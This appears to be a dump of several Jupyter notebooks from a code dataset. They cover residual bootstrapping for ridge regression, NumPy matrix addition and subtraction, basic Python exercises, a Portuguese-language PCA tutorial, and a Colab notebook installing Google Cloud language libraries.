"### PLOT RESIDUAL STATISTICS ###\n\nplt.figure(figsize=(16,5))\n\nplt.subplot(1,2,1)\nplt.title('Residuals Distribution')\nplt.hist(res, bins=20)\n\nplt.subplot(1,2,2)\nplt.title('Residuals Autocorrelation')\nplt.plot([res.autocorr(lag=dt) for dt in range(1,200)])\nplt.ylim([-1,1]); plt.axhline(0, c='black', linestyle='--')\nplt.ylabel('Autocorrelation'); plt.xlabel('Lags')\n\nplt.show()",
"_____no_output_____"
],
[
"### BOOTSTRAPPED INTERVALS ###\n\nalpha = 0.05\n\nbootstrap = np.asarray([np.random.choice(res, size=res.shape) for _ in range(100)])\nq_bootstrap = np.quantile(bootstrap, q=[alpha/2, 1-alpha/2], axis=0)\n\ny_pred = model.predict(X_test)\ny_lower = y_pred + q_bootstrap[0].mean()\ny_upper = y_pred + q_bootstrap[1].mean()",
"_____no_output_____"
],
[
"### HOW MANY OUTLIERS IN TEST DATA ###\n\n((y_test > y_upper).sum() + (y_test < y_lower).sum()) / y_test.shape[0]",
"_____no_output_____"
],
[
"### RIDGE TUNING ###\n\nmodel = GridSearchCV(estimator=Ridge(), param_grid={'alpha': [3, 5, 10, 20, 50]}, \n scoring='neg_mean_squared_error', cv=3, refit=True)\nmodel.fit(X_train, y_train)\n\nmodel.best_params_",
"_____no_output_____"
],
[
"### OUT-OF-FOLDS RESIDUAL DISTRIBUTION ###\n\npred_train = cross_val_predict(Ridge(**model.best_params_), X_train, y_train, cv=3)\n\nres = y_train - pred_train",
"_____no_output_____"
],
[
"### PLOT RESIDUAL STATISTICS ###\n\nplt.figure(figsize=(16,5))\n\nplt.subplot(1,2,1)\nplt.title('Residuals Distribution')\nplt.hist(res, bins=20)\n\nplt.subplot(1,2,2)\nplt.title('Residuals Autocorrelation')\nplt.plot([res.autocorr(lag=dt) for dt in range(1,200)])\nplt.ylim([-1,1]); plt.axhline(0, c='black', linestyle='--')\nplt.ylabel('Autocorrelation'); plt.xlabel('Lags')\n\nplt.show()",
"_____no_output_____"
],
[
"### BOOTSTRAPPED INTERVALS ###\n\nalpha = 0.05\n\nbootstrap = np.asarray([np.random.choice(res, size=res.shape) for _ in range(100)])\nq_bootstrap = np.quantile(bootstrap, q=[alpha/2, 1-alpha/2], axis=0)\n\ny_pred = pd.Series(model.predict(X_test), index=X_test.index)\ny_lower = y_pred + q_bootstrap[0].mean()\ny_upper = y_pred + q_bootstrap[1].mean()",
"_____no_output_____"
],
[
"### PLOT BOOTSTRAPPED PREDICTION INTERVALS ###\n\nplt.figure(figsize=(10,6))\n\ny_pred.plot(linewidth=3)\ny_test.plot(style='.k', alpha=0.5)\nplt.fill_between(y_pred.index, y_lower, y_upper, alpha=0.3)\nplt.title('Ridge test predictions')",
"_____no_output_____"
],
[
"### HOW MANY OUTLIERS IN TEST DATA ###\n\n((y_test > y_upper).sum() + (y_test < y_lower).sum()) / y_test.shape[0]",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb4fdbcca9dde9b1eb5cea7d686de930109bcd68 | 6,759 | ipynb | Jupyter Notebook | Python Exercise 2/NM_58101_Python_Exercise_2_Hizon.ipynb | TiffanyHizon/58101_Numerical_Methods | 5bf2928db2c9b92d8037d1fd15da224f05714903 | [
"Apache-2.0"
] | null | null | null | Python Exercise 2/NM_58101_Python_Exercise_2_Hizon.ipynb | TiffanyHizon/58101_Numerical_Methods | 5bf2928db2c9b92d8037d1fd15da224f05714903 | [
"Apache-2.0"
] | null | null | null | Python Exercise 2/NM_58101_Python_Exercise_2_Hizon.ipynb | TiffanyHizon/58101_Numerical_Methods | 5bf2928db2c9b92d8037d1fd15da224f05714903 | [
"Apache-2.0"
] | null | null | null | 23.14726 | 287 | 0.389111 | [
[
[
"<a href=\"https://colab.research.google.com/github/TiffanyHizon/58101_Numerical_Methods/blob/main/Python%20Exercise%202/NM_58101_Python_Exercise_2_Hizon.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"## **Matrix and its Operations**",
"_____no_output_____"
],
[
"Create a NumPy program that performs the operations of the given matrices:\n1. Sum = A + B\n2. Difference1 = B - A\n3. Difference2 = A - B\n\n$$A = \\begin{bmatrix} -5&0\\\\4&1 \\\\\\end{bmatrix} ,\n B = \\begin{bmatrix} 6 & -3 \\\\ 2 & 3 \\\\\\end{bmatrix} \\\\ $$",
"_____no_output_____"
]
],
[
[
"import numpy as np",
"_____no_output_____"
],
[
"A = np.array([\n [-5, 0],\n [4, 1]\n ])\nB = np.array([\n [6, -3],\n [2, 3]\n ])",
"_____no_output_____"
]
],
[
[
"**Addition**",
"_____no_output_____"
]
],
[
[
"#Eager Execution\n\nSum = A + B\nSum",
"_____no_output_____"
],
[
"#Functional Method\n\nSum = np.add(A, B)\nSum",
"_____no_output_____"
]
],
[
[
"**Subtraction - Difference 1**",
"_____no_output_____"
]
],
[
[
"#Eager Execution\n\nDifference1 = B - A\nDifference1",
"_____no_output_____"
],
[
"#Functional Method\n\nDifference1 = np.subtract(B, A)\nDifference1",
"_____no_output_____"
]
],
[
[
"**Subtraction - Difference 2**\n",
"_____no_output_____"
]
],
[
[
"#Eager Execution\n\nDifference2 = A - B\nDifference2",
"_____no_output_____"
],
[
"#Functional Method\n\nDifference2 = np.subtract(A, B)\nDifference2",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb4ff9d69eb9d3bb4719c799fb5c5b321dbba392 | 7,051 | ipynb | Jupyter Notebook | Python Programming Basic Assignment - Assignment25.ipynb | VaheC/Python_assigments | 9a46c19128d43fabd112983477d0dfed3639984a | [
"MIT"
] | null | null | null | Python Programming Basic Assignment - Assignment25.ipynb | VaheC/Python_assigments | 9a46c19128d43fabd112983477d0dfed3639984a | [
"MIT"
] | null | null | null | Python Programming Basic Assignment - Assignment25.ipynb | VaheC/Python_assigments | 9a46c19128d43fabd112983477d0dfed3639984a | [
"MIT"
] | null | null | null | 25.547101 | 111 | 0.46348 | [
[
[
"**Question1**\n<br>Create a function that takes three integer arguments (a, b, c) and returns the amount of\nintegers which are of equal value.\n<br>Examples\n<br>equal(3, 4, 3) ➞ 2\n<br>equal(1, 1, 1) ➞ 3\n<br>equal(3, 4, 1) ➞ 0\n<br>\n<br>Notes\n<br>Your function must return 0, 2 or 3.",
"_____no_output_____"
],
[
"**Answer:**",
"_____no_output_____"
]
],
[
[
"def equal(a, b, c):\n from collections import Counter\n temp_dict = dict(Counter([a, b, c]))\n temp_list = [temp_dict[i] for i in temp_dict if temp_dict[i]>1]\n if len(temp_list) == 0:\n return 0\n else:\n return temp_list[0]\n \nfor a, b, c in [(3, 4, 3), (1, 1, 1), (3, 4, 1)]:\n print(equal(a, b, c))",
"2\n3\n0\n"
]
],
[
[
"**Question2**\n<br>Write a function that converts a dictionary into a list of keys-values tuples.\n<br>Examples\n<br>dict_to_list({\n<br>\"D\": 1,\n<br>\"B\": 2,\n<br>\"C\": 3\n<br>}) ➞ [(\"B\", 2), (\"C\", 3), (\"D\", 1)]\n<br>dict_to_list({\n<br>\"likes\": 2,\n<br>\"dislikes\": 3,\n<br>\"followers\": 10\n<br>}) ➞ [(\"dislikes\", 3), (\"followers\", 10), (\"likes\", 2)]\n<br>\n<br>Notes\n<br>Return the elements in the list in alphabetical order.",
"_____no_output_____"
],
[
"**Answer:**",
"_____no_output_____"
]
],
[
[
"def dict_to_list(x):\n return sorted(x.items(), key=lambda k: k[0])\n\nfor x in [{\"D\": 1, \"B\": 2, \"C\": 3}, {\"likes\": 2, \"dislikes\": 3, \"followers\": 10}]:\n print(dict_to_list(x))",
"[('B', 2), ('C', 3), ('D', 1)]\n[('dislikes', 3), ('followers', 10), ('likes', 2)]\n"
]
],
[
[
"**Question3**\n<br>Write a function that creates a dictionary with each (key, value) pair being the (lower case,\nupper case) versions of a letter, respectively.\n<br>**Examples**\n<br>mapping([\"p\", \"s\"]) ➞ { \"p\": \"P\", \"s\": \"S\" }\n<br>mapping([\"a\", \"b\", \"c\"]) ➞ { \"a\": \"A\", \"b\": \"B\", \"c\": \"C\" }\n<br>mapping([\"a\", \"v\", \"y\", \"z\"]) ➞ { \"a\": \"A\", \"v\": \"V\", \"y\": \"Y\", \"z\": \"Z\" }\n<br>\n<br>Notes\n<br>All of the letters in the input list will always be lowercase.",
"_____no_output_____"
],
[
"**Answer:**",
"_____no_output_____"
]
],
[
[
"def mapping(x):\n return {i: i.upper() for i in x}\n\nfor x in [[\"p\", \"s\"], [\"a\", \"b\", \"c\"], [\"a\", \"v\", \"y\", \"z\"]]:\n print(mapping(x))",
"{'p': 'P', 's': 'S'}\n{'a': 'A', 'b': 'B', 'c': 'C'}\n{'a': 'A', 'v': 'V', 'y': 'Y', 'z': 'Z'}\n"
]
],
[
[
"**Question4**\n<br>Write a function, that replaces all vowels in a string with a specified vowel.\n<br>**Examples**\n<br>vow_replace(\"apples and bananas\", \"u\") ➞ \"upplus und bununus\"\n<br>vow_replace(\"cheese casserole\", \"o\") ➞ \"chooso cossorolo\"\n<br>vow_replace(\"stuffed jalapeno poppers\", \"e\") ➞ \"steffed jelepene peppers\"\n<br>\n<br>Notes\n<br>All words will be lowercase. Y is not considered a vowel.",
"_____no_output_____"
],
[
"**Answer:**",
"_____no_output_____"
]
],
[
[
"def vow_replace(x_text, x_vowel):\n temp_list = [x_vowel if i in ['a', 'e', 'i', 'o', 'u'] \n else i for i in list(x_text)]\n return ''.join(temp_list)\n\nfor x_text, x_vowel in [(\"apples and bananas\", \"u\"), \n (\"cheese casserole\", \"o\"), \n (\"stuffed jalapeno poppers\", \"e\")]:\n print(vow_replace(x_text, x_vowel))",
"upplus und bununus\nchooso cossorolo\nsteffed jelepene peppers\n"
]
],
[
[
"**Question5**\n<br>Create a function that takes a string as input and capitalizes a letter if its ASCII code is even\nand returns its lower case version if its ASCII code is odd.\n<br>**Examples**\n<br>ascii_capitalize(\"to be or not to be!\") ➞ \"To Be oR NoT To Be!\"\n<br>ascii_capitalize(\"THE LITTLE MERMAID\") ➞ \"THe LiTTLe meRmaiD\"\n<br>ascii_capitalize(\"Oh what a beautiful morning.\") ➞ \"oH wHaT a BeauTiFuL\nmoRNiNg.\"",
"_____no_output_____"
],
[
"**Answer:**",
"_____no_output_____"
]
],
[
[
"def ascii_capitalize(x):\n temp_list = [i.upper() if ord(i)%2==0 else i.lower() for i in list(x)]\n return ''.join(temp_list)\n\nfor x in [\"to be or not to be!\", \"THE LITTLE MERMAID\", \"Oh what a beautiful morning.\"]:\n print(ascii_capitalize(x))",
"To Be oR NoT To Be!\nTHe LiTTLe meRmaiD\noH wHaT a BeauTiFuL moRNiNg.\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
]
] |
cb50133b8787019cf8637e754f1b37819839383e | 157,999 | ipynb | Jupyter Notebook | PCA.ipynb | fabiobarreto-data-science/Data-Science---Let-s-Code | df60c8351141d3fcbd96589c4dd27e1054fed712 | [
"MIT"
] | null | null | null | PCA.ipynb | fabiobarreto-data-science/Data-Science---Let-s-Code | df60c8351141d3fcbd96589c4dd27e1054fed712 | [
"MIT"
] | null | null | null | PCA.ipynb | fabiobarreto-data-science/Data-Science---Let-s-Code | df60c8351141d3fcbd96589c4dd27e1054fed712 | [
"MIT"
] | null | null | null | 42.495697 | 20,992 | 0.454028 | [
[
[
"# PCA (Principal Component Analysis)\n---\n\n<img src=\"https://selecao.letscode.com.br/favicon.png\" width=\"40px\" style=\"position: absolute; top: 15px; right: 40px; border-radius: 5px;\" />\n\n## Introdução\n\nSão cada vez mais comuns a elevada quantidade de variáveis explicativas, porém quanto maior a quantidade de variáveis, mais difícil a interpretação da solução. A análise de componentes principais (Principal Component Analysis, PCA) é a técnica para reduzir a dimensionalidade desses conjuntos de dados, aumentando a interpretabilidade concomitante a minimização da perda de informações. Isso é feito criando novas variáveis não correlacionadas, preservando o máximo de variabilidade possível. Preservar o máximo de variabilidade possível, se traduz em encontrar novas variáveis que são funções lineares daquelas no conjunto de dados original.\n\n\nEm regressão linear, geralmente determinamos a linha de melhor ajuste ao conjunto de dados, mas aqui no PCA, determinamos várias linhas ortogonais entre si no espaço n-dimensional, de melhor ajuste ao conjunto de dados. Ortogonal significa que essas linhas estão em ângulo reto entre si. O número de dimensões será o mesmo que o número de variáveis. Por exemplo, um conjunto de dados com 3 variáveis terá espaço tridimensional.\n\nA análise de componentes principais é essencialmente apenas uma transformação de coordenadas. Considerando dados bidimencionais, por exemplo, os dados originais são plotados em um eixo X' e um eixo Y'. O método de PCA procura girar esses dois eixos para que o novo eixo X fique ao longo da direção da variação máxima nos dados. Como a técnica exige que os eixos sejam perpendiculares, em duas dimensões, a escolha de X' determinará Y'. Você obtém os dados transformados lendo os valores x e y deste novo conjunto de eixos, X 'e Y'. Para mais de duas dimensões, o primeiro eixo está na direção da maior variação; o segundo, na direção da segunda maior variação; e assim por diante.\n\n<img src=\"https://miro.medium.com/max/2625/1*ba0XpZtJrgh7UpzWcIgZ1Q.jpeg\" alt=\"\" width=\"40%\" style=\"display: block; margin: 20px auto;\" />\n\n## Procedimento para uma análise de componentes principais\n\nConsidere a matriz $X_{n \\times p}$ composta por observações de $p$ características de $n$ indivíduos de uma população. As características observadas são representadas pelas variáveis $X_1, X_2, X_3, \\cdots, X_p$.\n\n\n$$\n X = \\left [ \\begin{array}{ccccc}\nx_{11} & x_{12} & x_{13} & \\cdots & x_{1p}\\\\ \nx_{21} & x_{22} & x_{23} & \\cdots & x_{2p}\\\\ \n\\vdots & \\vdots & \\vdots & \\cdots & \\vdots \\\\\nx_{n1} & x_{n2} & x_{n3} & \\cdots & x_{np}\\\\ \n \\end{array} \\right ] \n$$\n\n### Passo 1\n\nPara dados em que as variáveis $X_i$ estão em escalas diferentes (por exemplo $X_1$ representa o valor de um carro e $X_2$ o consumo de gasolina), é necessário padronizar os dados. Isso porque os componentes são influenciados pela escala das variáveis, justamente porque as matrizes de covariâncias, $\\Sigma$ ou $\\hat{\\Sigma} = S$, são sensíveis à escala de um par de variáveis. Considere $\\bar{x_j}$ a média da variável $X_j$; $s(X_j)$ o desvio padrão de $X_j$; sendo $i = 1, 2,3,4,\\cdots, n$ e $j = 1, 2,3,4,\\cdots, p$. Com isso, a padronização pode ser realizada por meio da equação abaixo: \n\n- Média 0 e desvio padrão 1: \n\n$$ x'_{ij}= \\frac{x_{ij}-\\bar{X_j}}{s(X_j)} $$ \n\n<br>\n\n### Passo 2\n\nCalcular a matriz de **covariância** ou **correlação**. 
Caso as variáveis estejam em escalas diferentes, é possível calcular a matriz de correlação nos dados originais. Esta possibilidade se deve ao fato de que a matriz de covariâncias das variáveis padronizadas é igual a matriz de correlação das variáveis originais. \n\n$$\n S = \\left [ \\begin{array}{ccccc}\n\\hat{Var}(x_1) & \\hat{Cov}(x_1x_2) & \\hat{Cov}(x_1x_3) & \\cdots & \\hat{Cov}(x_1x_p)\\\\ \n\\hat{Cov}(x_2x_1) &\\hat{Var}(x_2)& \\hat{Cov}(x_2x_3) & \\cdots & \\hat{Cov}(x_2x_p)\\\\ \n\\vdots & \\vdots & \\vdots & \\cdots & \\vdots \\\\\n\\hat{Cov}(x_px_1) & \\hat{Cov}(x_px_2) & \\hat{Cov}(x_px_3) & \\cdots & \\hat{Var}(x_p)\\\\ \n \\end{array} \\right ] \n$$\n\n<br>\n<br>\n\n$$\n R = \\left [ \\begin{array}{ccccc}\n1 & r(x_1x_2) & r(x_1x_3) & \\cdots & r(x_1x_p)\\\\ \nr(x_2x_1) & 1 & r(x_2x_3) & \\cdots & r(x_2x_p)\\\\ \n\\vdots & \\vdots & \\vdots & \\cdots & \\vdots \\\\\nr(x_px_1) & r(x_px_2) & r(x_px_3) & \\cdots & 1\\\\ \n \\end{array} \\right ] \n$$\n\nEm que:\n\n$$\n \\begin{array}{ccc}\n\\hat{Var}(x_j) = \\frac{\\sum_{i=1}^{n}(x_{ij}-\\bar{x}_j}{n-1}, & \n\\hat{Cov}(x_{j1},x_{j2}) = \\frac{\\sum_{i=1}^n(x_{ij1}-\\bar{x_{j1}})(x_{ij2}-\\bar{x_{j2}})}{n-1}, &\nr(x_{j1},x_{j2}) = \\frac{\\hat{Cov}(x_{j1},x_{j2})}{S_{xj1}S_{xj2}}\n \\end{array} \n$$\n\n<br>\n\n### Passo 3\n\nAs componentes principais são determinadas através da equação característica da matriz S ou R:\n\n$$det[R - \\lambda I]= 0 $$\n\nEm que $I$ é a matriz identidade de dimensão $p\\times p$. \n\nSe R ou S tem posto completo igual a $p$, então $det[R - \\lambda I]= 0$, que pode ser reescrito como $\\mid R - \\lambda I \\mid = 0$, terá $p$ soluções. Lembrando que ter posto completo significa que nenhuma coluna é combinação linear de outra.\n\nConsidere que $\\lambda_1,\\lambda_2,\\lambda_3, \\cdots, \\lambda_p$ sejam as raízes da equação característica de R ou S, então temos que $\\lambda_1 > \\lambda_2 > \\lambda_3 > \\cdots, \\lambda_p$. Chamamos $\\lambda_i$ de autovalor. Além disso, para cada autovalor há um autovetor $\\tilde{a}_i$ associado.\n\n$$\n \\tilde{a}_i = \\left [ \\begin{array}{c}\na_{i1}\\\\ \na_{i2}\\\\ \n\\vdots \\\\\na_{ip} \\\\ \n \\end{array} \\right ] \n$$\n\nO cálculo do autovetor $\\tilde{a}_i$, pode ser realizado considerando a seguinte propriedade:\n\n$$ R\\tilde{a}_i = \\lambda_i \\tilde{a}_i $$\n\nEste resultado deve ser normalizado:\n\n$$ a_i = \\frac{\\tilde{a}_i }{\\mid \\tilde{a}_i \\mid}$$\n\ndesta forma a soma dos quadrados dos coeficientes é igual a 1 e são ortogonais entre si. \n\n<br>\n\n### Passo 4\nO cálculo da i-ésima componente principal é dado por:\n\n$$Z_i = a_{i1}X_1 + a_{i2}X_2 + a_{i3}X_3 + \\cdots + a_{ip}X_p $$\n\nem que $a_{i1}$ são as componetes do autovetor $a_i$ associado ao autovalor $\\lambda_i$.",
"_____no_output_____"
],
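Before turning to scikit-learn, the four steps above can be reproduced directly with NumPy. This is only an illustrative sketch (the function name and variable names are made up, and the eigenvector signs may differ from scikit-learn's output):

```python
import numpy as np

def pca_by_hand(X):
    """Illustrative sketch of steps 1-4 above using plain NumPy."""
    # Step 1: standardize to mean 0 and standard deviation 1
    Z = (X - X.mean(axis=0)) / X.std(axis=0)

    # Step 2: covariance matrix of the standardized data
    #         (equal to the correlation matrix of the original data)
    R = np.cov(Z, rowvar=False)

    # Step 3: eigenvalues (lambda_i) and normalized eigenvectors (a_i),
    #         sorted from largest to smallest eigenvalue
    eigvals, eigvecs = np.linalg.eigh(R)
    order = np.argsort(eigvals)[::-1]
    eigvals, eigvecs = eigvals[order], eigvecs[:, order]

    # Step 4: principal components Z_i = a_i^T x for every observation
    components = Z @ eigvecs

    explained_ratio = eigvals / eigvals.sum()
    return components, eigvals, eigvecs, explained_ratio
```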
[
"## Carregando o Dataset e Realizando uma Análise Exploratória dos Dados\n---",
"_____no_output_____"
]
],
[
[
"# Bibliotecas\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.datasets import load_breast_cancer",
"_____no_output_____"
],
[
"# Carregando dataset do load_breast_cancer\ndata = load_breast_cancer()",
"_____no_output_____"
],
[
"type(data)",
"_____no_output_____"
],
[
"data['data']",
"_____no_output_____"
],
[
"pd.DataFrame(data['data'])",
"_____no_output_____"
],
[
"data.keys()",
"_____no_output_____"
],
[
"data['feature_names']",
"_____no_output_____"
],
[
"df = pd.DataFrame(data['data'], columns=data['feature_names'])",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"data['target']",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"df['target'] = data['target']",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
]
],
[
[
"### Passo 1: Padronização do nosso conjunto de dados",
"_____no_output_____"
]
],
[
[
"# Separando apenas as features para transformar (X)\nX = df.drop('target', axis=1)",
"_____no_output_____"
],
[
"X.head()",
"_____no_output_____"
],
[
"from sklearn.preprocessing import StandardScaler",
"_____no_output_____"
],
[
"scaler = StandardScaler()",
"_____no_output_____"
],
[
"scaler.fit(X) # FIT é calcular a média e a variância de cada uma das variáveis.",
"_____no_output_____"
],
[
"scaler.mean_",
"_____no_output_____"
],
[
"scaler.var_",
"_____no_output_____"
],
[
"X_scaled = scaler.transform(X)",
"_____no_output_____"
],
[
"X_scaled # Transformou em média ZERO e desvio padrão UM",
"_____no_output_____"
],
[
"pd.DataFrame(X_scaled).describe()",
"_____no_output_____"
]
],
[
[
"### Resumindo a utilização do StandardScaler...",
"_____no_output_____"
]
],
[
[
"# OUTRO MÉTODO - MAIS RÁPIDO!!\nscaler = StandardScaler()",
"_____no_output_____"
],
[
"X_scaled = scaler.fit_transform(X)",
"_____no_output_____"
],
[
"X_scaled",
"_____no_output_____"
]
],
[
[
"### Passo 2: Calcular a matriz de covariância [...]",
"_____no_output_____"
],
[
"### Utilizando a biblioteca do Sklearn\n\n1. Padronizar as *features*\n2. Aplicar o PCA",
"_____no_output_____"
],
[
"#### Aplicando o PCA\nhttps://scikit-learn.org/stable/modules/generated/sklearn.decomposition.PCA.html",
"_____no_output_____"
]
],
[
[
"from sklearn.decomposition import PCA",
"_____no_output_____"
],
[
"pca = PCA()",
"_____no_output_____"
],
[
"pca.fit(X_scaled) # Esse FIT vai calcular os novos eixos",
"_____no_output_____"
]
],
[
[
"#### Obtendo a matriz de dados transformada",
"_____no_output_____"
]
],
[
[
"X_pca = pca.transform(X_scaled) # Vai padronizar",
"_____no_output_____"
],
[
"X_pca # As features convertidas em novos eixos com outros valores",
"_____no_output_____"
],
[
"X.head() # Features originais",
"_____no_output_____"
],
[
"X_pca = pd.DataFrame(X_pca, columns=[f'C{i}' for i in range(1, X.shape[1] + 1)])",
"_____no_output_____"
],
[
"X_pca",
"_____no_output_____"
]
],
[
[
"#### Analisando a variância explicada",
"_____no_output_____"
]
],
[
[
"pca.explained_variance_",
"_____no_output_____"
],
[
"pca.explained_variance_ratio_ # Variância em percentuais",
"_____no_output_____"
],
[
"pca.explained_variance_ratio_.cumsum() # Soma acumulada",
"_____no_output_____"
],
[
"plt.figure(figsize=(20, 8))\nplt.plot(X_pca.columns, pca.explained_variance_ratio_.cumsum())\nplt.bar(X_pca.columns, pca.explained_variance_ratio_)",
"_____no_output_____"
]
],
[
[
"#### Realizando a transformada inversa",
"_____no_output_____"
]
],
[
[
"pd.DataFrame(X_scaled)",
"_____no_output_____"
],
[
"X_inverted = pca.inverse_transform(X_pca)",
"_____no_output_____"
],
[
"pd.DataFrame(X_inverted)",
"_____no_output_____"
],
[
"X_original = scaler.inverse_transform(X_inverted)",
"_____no_output_____"
],
[
"pd.DataFrame(X_original)",
"_____no_output_____"
],
[
"X.head()",
"_____no_output_____"
]
],
[
[
"### Aplicando o PCA com otimização de variáveis",
"_____no_output_____"
]
],
[
[
"pca = PCA(n_components=0.95) # Corte as minhas variáveis para obter 95% das informações das originais",
"_____no_output_____"
],
[
"X_pca_optimized = pca.fit_transform(X_scaled)",
"_____no_output_____"
],
[
"X_pca_optimized.shape",
"_____no_output_____"
],
[
"X_pca_optimized.shape",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
cb50379c97e4a72d73996eec5878f2db7e84fbff | 35,495 | ipynb | Jupyter Notebook | googlesentiments.ipynb | Estampille/Cognitive-Services-Vision-Solution-Templates | ab32a817aea495547904d53926f3e15699275967 | [
"MIT"
] | null | null | null | googlesentiments.ipynb | Estampille/Cognitive-Services-Vision-Solution-Templates | ab32a817aea495547904d53926f3e15699275967 | [
"MIT"
] | null | null | null | googlesentiments.ipynb | Estampille/Cognitive-Services-Vision-Solution-Templates | ab32a817aea495547904d53926f3e15699275967 | [
"MIT"
] | null | null | null | 52.198529 | 387 | 0.545654 | [
[
[
"<a href=\"https://colab.research.google.com/github/Estampille/Cognitive-Services-Vision-Solution-Templates/blob/master/googlesentiments.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"\n\n!pip install --upgrade google-api-python-client\n!pip install google-cloud-language\n!pip3 install --upgrade google-cloud-storage\n!pip install --upgrade pip",
"Requirement already satisfied: google-api-python-client in /usr/local/lib/python3.7/dist-packages (2.0.2)\nRequirement already satisfied: google-auth<2dev,>=1.16.0 in /usr/local/lib/python3.7/dist-packages (from google-api-python-client) (1.27.1)\nRequirement already satisfied: uritemplate<4dev,>=3.0.0 in /usr/local/lib/python3.7/dist-packages (from google-api-python-client) (3.0.1)\nRequirement already satisfied: six<2dev,>=1.13.0 in /usr/local/lib/python3.7/dist-packages (from google-api-python-client) (1.15.0)\nRequirement already satisfied: google-api-core<2dev,>=1.21.0 in /usr/local/lib/python3.7/dist-packages (from google-api-python-client) (1.26.1)\nRequirement already satisfied: google-auth-httplib2>=0.0.3 in /usr/local/lib/python3.7/dist-packages (from google-api-python-client) (0.0.4)\nRequirement already satisfied: httplib2<1dev,>=0.15.0 in /usr/local/lib/python3.7/dist-packages (from google-api-python-client) (0.17.4)\nRequirement already satisfied: packaging>=14.3 in /usr/local/lib/python3.7/dist-packages (from google-api-core<2dev,>=1.21.0->google-api-python-client) (20.9)\nRequirement already satisfied: pytz in /usr/local/lib/python3.7/dist-packages (from google-api-core<2dev,>=1.21.0->google-api-python-client) (2018.9)\nRequirement already satisfied: setuptools>=40.3.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core<2dev,>=1.21.0->google-api-python-client) (54.1.2)\nRequirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core<2dev,>=1.21.0->google-api-python-client) (1.53.0)\nRequirement already satisfied: requests<3.0.0dev,>=2.18.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core<2dev,>=1.21.0->google-api-python-client) (2.23.0)\nRequirement already satisfied: protobuf>=3.12.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core<2dev,>=1.21.0->google-api-python-client) (3.12.4)\nRequirement already satisfied: rsa<5,>=3.1.4 in /usr/local/lib/python3.7/dist-packages (from google-auth<2dev,>=1.16.0->google-api-python-client) (4.7.2)\nRequirement already satisfied: cachetools<5.0,>=2.0.0 in /usr/local/lib/python3.7/dist-packages (from google-auth<2dev,>=1.16.0->google-api-python-client) (4.2.1)\nRequirement already satisfied: pyasn1-modules>=0.2.1 in /usr/local/lib/python3.7/dist-packages (from google-auth<2dev,>=1.16.0->google-api-python-client) (0.2.8)\nRequirement already satisfied: pyparsing>=2.0.2 in /usr/local/lib/python3.7/dist-packages (from packaging>=14.3->google-api-core<2dev,>=1.21.0->google-api-python-client) (2.4.7)\nRequirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /usr/local/lib/python3.7/dist-packages (from pyasn1-modules>=0.2.1->google-auth<2dev,>=1.16.0->google-api-python-client) (0.4.8)\nRequirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-api-core<2dev,>=1.21.0->google-api-python-client) (1.24.3)\nRequirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-api-core<2dev,>=1.21.0->google-api-python-client) (2.10)\nRequirement already satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-api-core<2dev,>=1.21.0->google-api-python-client) (3.0.4)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.7/dist-packages (from 
